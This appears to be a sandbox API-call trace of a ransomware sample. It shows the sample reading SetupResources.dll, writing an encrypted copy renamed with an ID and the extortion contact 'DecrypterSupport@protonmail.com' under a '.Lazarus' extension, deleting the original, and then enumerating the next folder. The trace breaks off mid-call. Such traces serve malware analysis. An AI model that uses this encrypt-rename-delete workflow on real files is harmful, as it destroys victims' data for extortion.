[0066.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x717c0 [0066.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0066.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x5e570 [0066.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0066.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0066.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0066.970] AreFileApisANSI () returned 1 [0066.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 108 [0066.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd8) returned 0x51398 [0066.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=108 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1037\\SetupResources.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 108 [0066.971] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\SetupResources.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1037\\setupresources.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.971] GetFileType (hFile=0x428) returned 0x1 [0066.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0066.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0066.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0066.971] AreFileApisANSI () returned 1 [0066.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0066.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71b68 [0066.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x71b68, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1037\\SetupResources.dll") returned 46 [0066.971] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1037\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0066.971] GetFileType (hFile=0x420) returned 0x1 [0066.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0066.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69bb0 [0066.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0066.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0066.972] GetLastError () returned 0x0 [0066.972] SetLastError (dwErrCode=0x0) [0066.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0066.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0066.972] GetLastError () returned 0x0 [0066.972] SetLastError (dwErrCode=0x0) [0066.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0066.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0066.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x84fb8 [0066.972] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0066.974] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0066.974] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4e0 [0066.974] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x85fc0 [0066.974] GetLastError () returned 0x0 [0066.974] SetLastError (dwErrCode=0x0) [0066.975] GetLastError () returned 0x0 [0066.975] SetLastError (dwErrCode=0x0) [0066.975] GetLastError () returned 0x0 [0066.975] SetLastError (dwErrCode=0x0) [0066.975] GetLastError () returned 0x0 [0066.975] SetLastError (dwErrCode=0x0) [0066.975] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.984] WriteFile (in: hFile=0x428, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.985] GetLastError () returned 0x0 [0066.985] SetLastError (dwErrCode=0x0) [0066.985] GetLastError () returned 0x0 [0066.985] SetLastError (dwErrCode=0x0) [0066.985] GetLastError () returned 0x0 [0066.985] SetLastError (dwErrCode=0x0) [0066.985] GetLastError () returned 0x0 [0066.985] SetLastError (dwErrCode=0x0) [0066.985] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.986] WriteFile (in: hFile=0x428, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.986] GetLastError () returned 0x0 [0066.986] SetLastError (dwErrCode=0x0) [0066.986] GetLastError () returned 0x0 [0066.986] SetLastError (dwErrCode=0x0) [0066.986] GetLastError () returned 0x0 [0066.986] SetLastError (dwErrCode=0x0) [0066.986] GetLastError () returned 0x0 [0066.986] SetLastError (dwErrCode=0x0) [0066.986] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.986] WriteFile (in: hFile=0x428, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.987] GetLastError () returned 0x0 [0066.987] SetLastError (dwErrCode=0x0) [0066.987] GetLastError () returned 0x0 [0066.987] SetLastError (dwErrCode=0x0) [0066.987] GetLastError () returned 0x0 [0066.987] SetLastError (dwErrCode=0x0) [0066.987] GetLastError () returned 0x0 [0066.987] SetLastError (dwErrCode=0x0) [0066.987] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x158, lpOverlapped=0x0) returned 1 [0066.987] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0066.987] WriteFile (in: hFile=0x428, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.988] GetLastError () returned 0x0 [0066.988] SetLastError (dwErrCode=0x0) [0066.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0066.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d768 [0066.988] GetLastError () returned 0x0 [0066.988] SetLastError (dwErrCode=0x0) [0066.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4e0 | out: hHeap=0x20000) returned 1 [0066.988] WriteFile (in: hFile=0x428, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327ef70*=0x160, lpOverlapped=0x0) returned 1 [0066.988] GetLastError () returned 0x0 [0066.988] SetLastError (dwErrCode=0x0) [0066.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0066.988] GetLastError () returned 0x0 [0066.988] SetLastError (dwErrCode=0x0) [0066.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0066.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0066.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d768 | out: hHeap=0x20000) returned 1 [0066.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0066.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0066.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0066.989] CloseHandle (hObject=0x428) returned 1 [0066.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0066.990] CloseHandle (hObject=0x420) returned 1 [0066.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0066.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0066.990] AreFileApisANSI () returned 1 [0066.990] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0066.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71620 [0066.991] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x71620, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1037\\SetupResources.dll") returned 46 [0066.991] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1037\\setupresources.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0066.992] GetFileType (hFile=0x420) returned 0x1 [0066.992] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0066.992] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x84fb8 [0066.992] GetLastError () returned 0xb7 [0066.992] SetLastError (dwErrCode=0xb7) [0066.992] WriteFile (in: hFile=0x420, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0066.993] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0066.993] CloseHandle (hObject=0x420) returned 1 [0066.993] AreFileApisANSI () returned 1 [0066.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0066.993] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71ca0 [0066.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1037\\SetupResources.dll") returned 46 [0066.993] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1037\\setupresources.dll")) returned 1 [0066.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0066.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0066.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0066.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0066.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0066.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0066.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0066.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0066.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d7b0 | out: hHeap=0x20000) returned 1 [0066.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d798 | out: hHeap=0x20000) returned 1 [0066.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0066.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b450 | out: hHeap=0x20000) returned 1 [0066.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0066.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0066.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0066.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0066.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0066.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0066.995] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.995] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.995] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x1, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4f1, ftLastWriteTime.dwHighDateTime=0x1, nFileSizeHigh=0x0, nFileSizeLow=0x28bf8, dwReserved0=0x1, dwReserved1=0x0, cFileName="ƿ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧賂̧⺊Ā̧붼聐̧㑍Ā̧蜐\x07̧비聐萀\x08賂̧")) returned 0 [0066.995] FindClose (in: hFindFile=0x78710 | out: hFindFile=0x78710) returned 1 [0066.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0066.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0066.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0066.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0066.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0066.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0066.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0066.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0066.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0066.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x467b8 | out: hHeap=0x20000) returned 1 [0066.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0066.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0066.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0066.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0066.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0066.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0066.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0066.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0066.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0066.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69170 [0066.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0066.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0066.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0066.995] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.996] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.996] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.996] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0066.996] AreFileApisANSI () returned 1 [0066.996] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1038", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1038", lpUsedDefaultChar=0x0) returned 27 [0066.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0066.996] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.996] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0066.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0066.996] AreFileApisANSI () returned 1 [0066.996] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0066.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78550 [0066.996] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887e8, cbMultiByte=-1, lpWideCharStr=0x78550, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1038") returned 27 [0066.996] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038" (normalized: "c:\\588bce7c90097ed212\\1038"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.996] GetLastError () returned 0x5 [0066.996] GetLastError () returned 0x5 [0066.996] SetLastError (dwErrCode=0x5) [0066.996] GetLastError () returned 0x5 [0066.996] SetLastError (dwErrCode=0x5) [0066.996] GetLastError () returned 0x5 [0066.996] SetLastError (dwErrCode=0x5) [0066.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78550 | out: hHeap=0x20000) returned 1 [0066.996] AreFileApisANSI () returned 1 [0066.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0066.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78510 [0066.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887e8, cbMultiByte=-1, lpWideCharStr=0x78510, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1038") returned 27 [0066.997] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038" (normalized: "c:\\588bce7c90097ed212\\1038"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.997] GetLastError () returned 0x5 [0066.997] GetLastError () returned 0x5 [0066.997] SetLastError (dwErrCode=0x5) [0066.997] GetLastError () returned 0x5 [0066.997] SetLastError (dwErrCode=0x5) [0066.997] GetLastError () returned 0x5 [0066.997] SetLastError (dwErrCode=0x5) [0066.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78510 | out: hHeap=0x20000) returned 1 [0066.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0066.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0066.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0066.997] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.997] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.997] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.997] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0066.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0066.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0066.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0066.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0066.997] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="1040", cAlternateFileName="")) returned 1 [0066.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0066.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0066.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0066.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0066.997] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\1038\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78090 [0066.998] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.998] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x109e, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0066.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0066.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0066.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0066.998] RtlAllocateHeap (HeapHandle=0x20000, 